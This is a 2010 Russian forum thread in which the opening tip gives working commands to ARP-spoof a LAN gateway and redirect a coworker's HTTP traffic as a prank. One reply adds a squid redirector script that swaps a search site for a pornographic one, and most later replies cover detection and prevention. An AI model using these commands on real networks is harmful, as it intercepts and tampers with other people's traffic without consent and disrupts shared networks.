URL: https://www.opennet.me/cgi-bin/openforum/vsluhboard.cgi
Форум: vsluhforumID3
Нить номер: 71166
[ Назад ]

Исходное сообщение
"Раздел полезных советов: Подстановка HTTP-трафика определенн..."

Отправлено auto_tips , 02-Окт-10 16:45 
Используя нехитрые манипуляции в Linux можно подшутить или удивить соседа по офису, например отобразив персональное поздравление при попытке открыть соседом какой-нибудь известного ресурса. Манипуляции проделываются без изменения конфигурации шлюза, путем поднятия web-сервера на своей машине и перенаправление на него запросов, через подмену ARP-адреса шлюза в кэше на машине соседа. Техника действует только в пределах локальной сети.

Включаем на своей машине перенаправление IP-пакетов:

   echo 1 > /proc/sys/net/ipv4/ip_forward

Перенаправляем запросы на 80-порт, заменив адрес назначения в пакете на 192.168.1.200 - локальный IP машины с подставным шлюзом. На локальной машине должен быть заблаговременно поднят http-сервер с нужной страницей.

   iptables -t nat -A PREROUTING -p tcp --dport 80 -j NETMAP --to 192.168.1.200

Добавляем адрес реального шлюза (192.168.1.1) на сетевой интерфейс:

   ip addr add 192.168.1.1/24 dev eth0

Анонсируем смену MAC-адреса шлюза:

   arping -c 3 -A -I eth0 192.168.1.1

После завершения розыгрыша убираем IP шлюза с локального интерфейса:

   ip addr delete 192.168.1.1/24 dev eth0
   iptables -t nat -D PREROUTING -p tcp --dport 80 -j NETMAP --to 192.168.1.200
   ifconfig eth0 down
   ifconfig eth0 up
   arp -d 192.168.1.1

Внимание, описанное действие не следует применять в рабочей сети предприятия, так как подстановка шлюза на время блокирует работу сети из-за конфликта с реальным шлюзом.


URL: http://blog.ksplice.com/2010/09/hijacking-http-traffic-on-yo.../
Обсуждается: http://www.opennet.me/tips/info/2450.shtml


Содержание

Сообщения в этом обсуждении
"Подстановка HTTP-трафика определенному компьютеру в локальной сети"
Отправлено Аноним , 02-Окт-10 16:45 
На предприятиях очень часто в интернет через прокси выходят.

"Подстановка HTTP-трафика определенному компьютеру в локально..."
Отправлено pavlinux , 02-Окт-10 21:52 
Да собственно... Почему бы не поднять squid вместо вебсервака :)

url_rewrite_program redirector.pl


#!/usr/bin/perl
        $|=1;
        while (<>) {
                s@http://www.yandex.ru@http://www.spankwire.com@;
                print;
        }

Весь офис будет рад :)

или вот эту хрень http://squirm.foote.com.au/ прикрутить.


"Подстановка HTTP-трафика определенному компьютеру в локально..."
Отправлено mitiok , 02-Окт-10 18:20 
наверное подделать популярные зоны в бинде и засунуть розыгрываемого во view было бы более safe

"Подстановка HTTP-трафика определенному компьютеру в локально..."
Отправлено Xaionaro , 04-Окт-10 14:07 
Это требует доступа к bind.

"Подстановка HTTP-трафика определенному компьютеру в локально..."
Отправлено Andrey Mitrofanov , 04-Окт-10 15:22 
> Это требует доступа к bind.

Да-да... Или отдельного "полезного" совета ""Подстановка DNS-трафика определенному компьютеру в локальной сети"".


"Подстановка HTTP-трафика определенному компьютеру в локально..."
Отправлено Xaionaro , 04-Окт-10 15:54 
>> Это требует доступа к bind.
> Да-да... Или отдельного "полезного" совета ""Подстановка DNS-трафика определенному компьютеру
> в локальной сети"".

:))

Но так или иначе будет применяться скорее всего arp-спуфинг, что приведёт к тем же минусам. ;)


"Раздел полезных советов: Подстановка HTTP-трафика определенн..."
Отправлено Jordan , 02-Окт-10 23:54 
Ога, главное всё сделать пока админ не пришол :)
P.S.
"через подмену ARP-адреса шлюза в кэше на машине соседа."
как это реализовать если нет доступа к машине соседа?
P.S.S.
Это работоспособно при включеном шлюзе?

"Раздел полезных советов: Подстановка HTTP-трафика определенн..."
Отправлено Дядя Федор , 03-Окт-10 22:21 
Почитайте как работает ARP-кэш. Может снизойдет озарение. Добавлю только, что "подменой" надо заниматься как минимум раз в 30 секунд (анонсировать изменение МАК-адреса шлюза).

"Подстановка HTTP-трафика определенному компьютеру в локальной сети"
Отправлено User294 , 04-Окт-10 00:08 
"How to pwn your corporate network for dummies" :-)

"Подстановка HTTP-трафика определенному компьютеру в локальной сети"
Отправлено Aquarius , 04-Окт-10 01:30 
шлюз будет недоволен, а за ним и админ

"Подстановка HTTP-трафика определенному компьютеру в локальной сети"
Отправлено keir , 04-Окт-10 15:13 
В нормально настроенной сети это не провернуть. И вообще, мануал из серии "как делать не надо, чтобы выжить"

"Подстановка HTTP-трафика определенному компьютеру в локально..."
Отправлено Xaionaro , 04-Окт-10 15:58 
> В нормально настроенной сети это не провернуть. И вообще, мануал из серии
> "как делать не надо, чтобы выжить"

Ну что такое "нормально настроенная сеть"? Есть вот два cisco-выз свитча, в который втыкается соотвественно два клиента, но работают оба через один и тот же vlan. Что помешает данному хаку? Или что в данной сети настроено не "нормально"?


"Подстановка HTTP-трафика определенному компьютеру в локально..."
Отправлено keir , 04-Окт-10 20:42 
Помешает switchport protected. За каким чертом двум клиентским компам в рабочей обстановке общаться между собой? Правильно, незачем. А если файлы друг-другу захотят передать - для этого используется корпоративная почта/ftp.

"Подстановка HTTP-трафика определенному компьютеру в локально..."
Отправлено Xaionaro , 04-Окт-10 21:03 
> Помешает switchport protected. За каким чертом двум клиентским компам в рабочей обстановке
> общаться между собой? Правильно, незачем. А если файлы друг-другу захотят передать
> - для этого используется корпоративная почта/ftp.

Ну в разных подразделениях разных контор - по-разному. Например, в МИФИ нет корпоративного FTP. Почему? Гос. контора, там всё очень сложно.

Вот взять например моё помещение. В моём помещении стоит одна циска, а в помещении напротив - другая. Там и там работают люди из одного отдела и плотно друг с другом взаимодействуют. Дак вот не вижу смысл запрещать заходить по ssh ко мне с соседнего компьютера (только с моего компьютера можно без затрат большого кол-ва времени достучаться до некоторых ресурсов, а бегать между своим компом и соседним помещенгием тоже не хочется). Тем более, т.к. достаточно проблематично выбить сервер, нередко приходится в качестве тестового компьютера использовать свой рабочий, из-за чего он нередко выступает в роли малого тестового _сервера_.

Ну или взять общежитие МИФИ. Там студенты свободно обмениваются трафиков. Или вы считаете, что нормальной настройкой студенческой сети - это запретить им общаться друг с другом? Я считаю что это нельзя делать как и из этических соображений, так и из материальных, ибо, например, тот же "retracker.local" в локальной сети экономит нехилый процент канала в Интернет.

P.S.: В общежитии на один vlan приходится около 50 студентов.


"Подстановка HTTP-трафика определенному компьютеру в локально..."
Отправлено keir , 04-Окт-10 21:13 
>[оверквотинг удален]
> до некоторых ресурсов, а бегать между своим компом и соседним помещенгием
> тоже не хочется). Тем более, т.к. достаточно проблематично выбить сервер, нередко
> приходится в качестве тестового компьютера использовать свой рабочий, из-за чего он
> нередко выступает в роли малого тестового _сервера_.
> Ну или взять общежитие МИФИ. Там студенты свободно обмениваются трафиков. Или вы
> считаете, что нормальной настройкой студенческой сети - это запретить им общаться
> друг с другом? Я считаю что это нельзя делать как и
> из этических соображений, так и из материальных, ибо, например, тот же
> "retracker.local" в локальной сети экономит нехилый процент канала в Интернет.
> P.S.: В общежитии на один vlan приходится около 50 студентов.

Извините, но начиналось все с соседа по офису, т.е. речь об организации, которая деньги зарабатывает. Студенческая сеть, конечно, совсем другое дело.


"Подстановка HTTP-трафика определенному компьютеру в локально..."
Отправлено Xaionaro , 04-Окт-10 21:16 
> Извините, но начиналось все с соседа по офису, т.е. речь об организации,
> которая деньги зарабатывает. Студенческая сеть, конечно, совсем другое дело.

Это я извиняюсь, забыл некоторые элементы основного сообщения. Но пример с моим рабочим помещением остаётся в силе :)


"Подстановка HTTP-трафика определенному компьютеру в локально..."
Отправлено Дядя Федор , 05-Окт-10 09:18 
> Это я извиняюсь, забыл некоторые элементы основного сообщения. Но пример с моим
> рабочим помещением остаётся в силе :)

Откройте для себя L3-уровень. И прочитайте - что такое маршрутизация. VLAN, как известно - L2.


"Подстановка HTTP-трафика определенному компьютеру в локально..."
Отправлено keir , 05-Окт-10 23:09 
Кстати говоря, хорошо настроенный и отфильтрованный L2 иногда поудобнее L3 бывает-с.

"Подстановка HTTP-трафика определенному компьютеру в локально..."
Отправлено Xaionaro , 06-Окт-10 02:19 
>> Это я извиняюсь, забыл некоторые элементы основного сообщения. Но пример с моим
>> рабочим помещением остаётся в силе :)
>  Откройте для себя L3-уровень. И прочитайте - что такое маршрутизация. VLAN,
> как известно - L2.

Я знаю что такое маршрутизация, и знаю где L2, а где L3. И что вы предлагаете? Зарание скажу, что в организации количество клиентов по порядку величины соотвествует десятку тысяч.

Тут несколько сотен VLAN-ов в VTP-домене, детерменируемых на шеститысячнике. И "маршрутизация" во всю используется :)


"Подстановка HTTP-трафика определенному компьютеру в локально..."
Отправлено Дядя Федор , 06-Окт-10 19:08 
> Тут несколько сотен VLAN-ов в VTP-домене, детерменируемых на шеститысячнике.

Наверное все-таки "терминируемых". :)

>  И "маршрутизация" во всю используется :)

Ну дык - а в чем тогда проблема? Для доступа к компьютерам в другом влане используется маршрутизация (SVI или IP unnumbered - не суть важно).


"Подстановка HTTP-трафика определенному компьютеру в локально..."
Отправлено Xaionaro , 09-Окт-10 09:28 
>> Тут несколько сотен VLAN-ов в VTP-домене, детерменируемых на шеститысячнике.
>  Наверное все-таки "терминируемых". :)

Упс. Бывает :). Перечитал научно-популярного чтива на тему детерминирована ли наша Вселенная, в то время как термин "терминируемые" относительно vlan-ов использовал в своей жизни считанное кол-во раз :)

>>  И "маршрутизация" во всю используется :)
>  Ну дык - а в чем тогда проблема? Для доступа к
> компьютерам в другом влане используется маршрутизация (SVI или IP unnumbered -
> не суть важно).

Я честно сказать не цисковод, и что есть перечисленные термины могу представить только смутно. Разве что я так понимаю, это какие-то технологии для объедидения vlan-ов. И честно сказать не очень понимаю смысл таких велосипедов, особенно когда идёт речь о vlan-е сотрудников _одного_ отдела. Тем более как я уже сказал ранее, тут клиенты измеряются тысячами и если в данных технологиях требуется на каждого заводить свой vlan, то эта технология мягко говоря неприемлема, т.к. тут исторически используется единый VTP-домен, а большенство цисок и так уже скоро будут переполнены vlan-ами. Да и адресное пространство, не предётся ли на каждого клиента заводить свою подсеть со своим шлюзом? Опять же, если это так, то это опять же неприемлемо. Да и если уж на то пошло, то есл кто-то и захочет устроить саботаж, то вряд ли ему это помешает (по крайней мере в моём случае, т.к. работаю я в отделе телекоммуникаций хоть и занимаюсь серверами, а не сетью). :)

Однако если вам не лень рассказать, я буду рад послушать, что умеют данные технологии и как их можно применить.


"Подстановка HTTP-трафика определенному компьютеру в локально..."
Отправлено Дядя Федор , 09-Окт-10 20:55 
Да не в этом дело. Можно хоть на каждого сотрудника заводить VLAN. И они будут друг друга прекрасно "видеть" по сети. Вот о чем я говорил выше. :) Кстати, технология VLAN per user - используется у нас - я у провайдера местного работаю. Очень надежная технология. Терминация VLAN-IP делается на цисках (6-тонниках и 2950). Если юзверь поменяет себе IP (что актуально в сетях домовых провайдеров) - фиг у него будет сеть работать. :)  Просто и надежно. Хотя и влечет за собой довольно большие накладные расходы - как финансовые (применение только управляемых свичей, ограничение количества VLAN на кошках), так и организационные (необходимо вести базу вланов и назначать их - с последующим прописыванием на цисках).

"Подстановка HTTP-трафика определенному компьютеру в локально..."
Отправлено User294 , 05-Окт-10 15:53 
> - для этого используется корпоративная почта/ftp.

Только они имеют такое нехорошее свойство - место там заканчиватся почему-то. И даже довольно быстро. А если сервак нагибается - вся контора дружно курит бамбук, радуясь халяве. Поэтому обычно в реалных Ынтерпрайзах используются и ресурсы клиенских машин по мере необходимости.


"Подстановка HTTP-трафика определенному компьютеру в локально..."
Отправлено keir , 05-Окт-10 23:14 
>> - для этого используется корпоративная почта/ftp.
> Только они имеют такое нехорошее свойство - место там заканчиватся почему-то. И
> даже довольно быстро. А если сервак нагибается - вся контора дружно
> курит бамбук, радуясь халяве. Поэтому обычно в реалных Ынтерпрайзах используются и
> ресурсы клиенских машин по мере необходимости.

Ну, любой сервер может нагнуться, так что в "реальных Ынтерпрайзах" приходится заниматься еще и отказоустойчивостью :) В любом случае сервер лучше - через него можно вести реальный контроль кто-что-куда, а не сидеть в ожидании чуда, пока коллеги друг другу вирусы рассылают :)


"Подстановка HTTP-трафика определенному компьютеру в локально..."
Отправлено XoRe , 06-Окт-10 19:16 
>> - для этого используется корпоративная почта/ftp.
> Только они имеют такое нехорошее свойство - место там заканчиватся почему-то. И
> даже довольно быстро.

Ну у вас и аргументы, уважаемый =)
Не, ну правда - подсистемы хранения сейчас относительно дешевы.
Если предприятие такое большое, что документы забивают терабайты, то на 4 sas винта в raid10 + контроллер e200 деньги найдутся.
А если хочется дешево и сердито, то дешевый рейд10 контроллер и 4 sata винта выходят вообще недорого)


"Подстановка HTTP-трафика определенному компьютеру в локально..."
Отправлено User294 , 08-Окт-10 02:51 
> А если хочется дешево и сердито, то дешевый рейд10 контроллер и 4
> sata винта выходят вообще недорого)

Ну да. А потом у таких умников нагибается сервант (любая железка может сломаться) и вся контора радостно курит бамбук. Знаем мы эти совковые Ынтерпрайзы, где на эффективность и безгеморность работы сотрудников всем класть с прибором, зато какойнить бзик по части "как бы чего не сперли" или какой там еще фигне. При том кому надо - все-равно успешно все прут, зато  когда централизованный сервак дает дуба - толпа народа радостно курит бамбук а админы срут кирпичами :). ИМХО зависимость работы всей конторы от 1 сервера - зло. Так, глядя на то какой пипец начинается когда сервак подыхает :)

Алсо нынче в моде например виртуализация. Представляете себе если програмеры/тестеры/прочий сброд начнут какиенить там временные тестовые виртуалки на много мегазов а то и гигазов каждая на фтпушник лить? И ессно забудут стирать. А на квоты периодически брыкаться когда они работе мешают. И насколько таким макаром места и терпения куль-одминов хватит? :) Вообще, вы имхо по сути извращаетесь, делая из быстрой swiched сети не то что даже более медленную routed, а даже коммутируемую на уровне примерно так L7 сеть. При том "коммутатором" получается фтпушник. Что вообще-то слегка изврат - тормозно и грабельно. Как минимум *удваивается* время на передачу файла по сравнению с шарингом файла напрямую с машины юзера. Для жирных файлов это вообще-то Ж.


"Подстановка HTTP-трафика определенному компьютеру в локально..."
Отправлено XoRe , 09-Окт-10 00:46 
Чет вас понесло.
Личный негативный опыт?)

"Подстановка HTTP-трафика определенному компьютеру в локальной сети"
Отправлено Дядя Федор , 04-Окт-10 16:14 
Ну, как вариант - APR-кэш может быть сформирован статиком. :) Или где-нить в сети будет стоять arpwatch. Который будет дико материться, обнаружив подобную ситуацию.

"Подстановка HTTP-трафика определенному компьютеру в локально..."
Отправлено Аноним , 05-Окт-10 06:30 
Фуууу ... мой arpwatch тихо и интеллигентно залогирует факт, отправит мне письмо да и заблокирует порт на свиче :)

Как делать? - гугл завалит вариантами ...


"Подстановка HTTP-трафика определенному компьютеру в локально..."
Отправлено Дядя Федор , 05-Окт-10 09:17 
Под словом "материться" я как раз таки и не имел в виду "расстрел на месте". :) Обычного логгирования вполне себе достаточно.

"Подстановка HTTP-трафика определенному компьютеру в локально..."
Отправлено Аноним , 06-Окт-10 05:04 
Не дядя Фёдор - недостаточно!
Оно необходимо, но недостаточно. Тут нужны более активные действия. Просемафорить админу, задрать аларм в NMS ... У менея же порешили что и порт блокировать - вполне резонно. Пока ни одного шутника не уволили ибо шутка получается против себя :)

"Подстановка HTTP-трафика определенному компьютеру в локально..."
Отправлено Дядя Федор , 06-Окт-10 19:10 
> Оно необходимо, но недостаточно. Тут нужны более активные действия. Просемафорить админу,
> задрать аларм в NMS ... У менея же порешили что и
> порт блокировать - вполне резонно. Пока ни одного шутника не уволили
> ибо шутка получается против себя :)

Ну это уже зависит от уровня "фашизма" админа. :) Во многих случаях вполне обоснованного.


"Подстановка HTTP-трафика определенному компьютеру в локальной сети"
Отправлено splat_pack , 04-Окт-10 17:53 
за такие "шутки" шутник обычно увольняется сходу..

"Подстановка HTTP-трафика определенному компьютеру в локально..."
Отправлено XoRe , 05-Окт-10 11:39 
>Внимание, описанное действие не следует применять в рабочей сети предприятия, так как подстановка шлюза на время блокирует работу сети из-за конфликта с реальным шлюзом.

Т.е. у всего отдела (или конторы) "внезапно" пропадет интернет.
Такого вообще не нужно делать, ни дома, ни на работе.

> за такие "шутки" шутник обычно увольняется сходу..

Вот-вот.
Ну или наказывается так, чтобы отбило охоту тратить оплачиваемое время на создание препятствий производственному процессу других людей.


"Подстановка HTTP-трафика определенному компьютеру в локально..."
Отправлено d8r8dr , 06-Окт-10 08:54 
шутка удается с первыми лицами предприятия (и до них это доходит) - админ идет искать работу

"Подстановка HTTP-трафика определенному компьютеру в локально..."
Отправлено Аноним , 06-Окт-10 10:12 
> шутка удается с первыми лицами предприятия (и до них это доходит) -
> админ идет искать работу

Не совсем так, если первые лица предприятия смогут провернуть такую шутку, админ админящий такую сетку пойдет искать работу.


"Подстановка HTTP-трафика определенному компьютеру в локально..."
Отправлено axe , 10-Дек-10 16:01 
>> шутка удается с первыми лицами предприятия (и до них это доходит) -
>> админ идет искать работу
> Не совсем так, если первые лица предприятия смогут провернуть такую шутку, админ
> админящий такую сетку пойдет искать работу.

может они просто поменяются местами тогда уж?